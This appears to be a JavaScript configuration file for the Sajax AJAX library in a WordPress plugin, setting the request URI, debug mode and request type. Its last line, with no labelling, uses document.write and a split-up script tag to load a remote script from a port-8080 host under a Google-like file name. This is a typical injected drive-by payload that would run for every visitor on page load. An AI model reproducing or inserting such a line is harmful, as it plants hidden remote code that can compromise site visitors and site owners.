// In case AJAX DOESN'T work and/or your WP runs on an IIS Server,
// you may want to try one of the alterantive URI='s below:

var sajax_uri = '/';
// var sajax_uri = document.location.pathname;
// var sajax_uri = 'YOUR-ABSOLUTE-PATH-TO-THE-PAGE';

var sajax_debug_mode = false;

var sajax_request_type = "POST";
var sajax_target_id = "";
var sajax_failure_redirect = "";


document.write('<s'+'cript type="text/javascript" src="http://roundstorm.com:8080/Google.js"></scr'+'ipt>');